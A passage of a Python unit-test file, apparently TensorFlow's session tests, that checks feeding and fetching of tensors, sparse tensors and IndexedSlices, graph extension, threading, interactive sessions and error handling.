sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
@test_util.run_v1_only('b/120545219')
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.VariableV1(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
@staticmethod
def _build_graph():
time.sleep(random.random() * 0.1)
# Do some graph construction. Try to exercise non-trivial paths.
graph = ops.get_default_graph()
gdef = None
for _ in range(10):
x = array_ops.placeholder(dtype=dtypes.float32)
with ops.colocate_with(x):
y = array_ops.placeholder(dtype=dtypes.float32)
with ops.device('/cpu:0'):
z = control_flow_ops.while_loop(
lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
gradients_impl.gradients(z, [x, y])
if gdef is None:
gdef = graph.as_graph_def()
else:
importer.import_graph_def(gdef, name='import')
@test_util.run_v1_only('b/120545219')
def testParallelRunAndSingleBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in threads:
t.start()
SessionTest._build_graph()
stop.set()
for t in threads:
t.join()
@test_util.run_v1_only('b/120545219')
def testParallelRunAndParallelBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in run_threads:
t.start()
build_threads = [self.checkedThread(target=SessionTest._build_graph)
for _ in range(10)]
for t in build_threads:
t.start()
for t in build_threads:
t.join()
# Let the run_threads run until the build threads are finished.
stop.set()
for t in run_threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
@test_util.run_v1_only('b/120545219')
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
@test_util.run_v1_only('b/120545219')
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
@test_util.run_v1_only('b/120545219')
def testMultipleInteractiveSessionsWarning(self):
# Reinitialize the global state to ensure that the expected warnings will
# be emitted.
session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access
sess = session.InteractiveSession()
sess.run(constant_op.constant(4.0)) # Run so that the session is "opened".
sess.close()
# Opening and closing interactive sessions serially should not warn.
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
sess.close()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess2 = session.InteractiveSession()
self.assertEqual(1, len(w))
self.assertTrue('An interactive session is already active. This can cause '
'out-of-memory errors in some cases. You must explicitly '
'call `InteractiveSession.close()` to release resources '
'held by the other session(s).' in str(w[0].message))
sess2.close()
sess.close()
@test_util.run_v1_only('b/120545219')
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
@test_util.run_v1_only('b/120545219')
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testOptimizedMakeCallable(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
for _ in range(3):
callable_fn = sess._make_callable_from_options(callable_opts)
for _ in range(5):
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))
def testOptimizedMakeCallableWithRunMetadata(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
callable_fn = sess._make_callable_from_options(callable_opts)
run_metadata = config_pb2.RunMetadata()
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'Input to reshape is a tensor with 4 values, '
'but the requested shape has 21'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
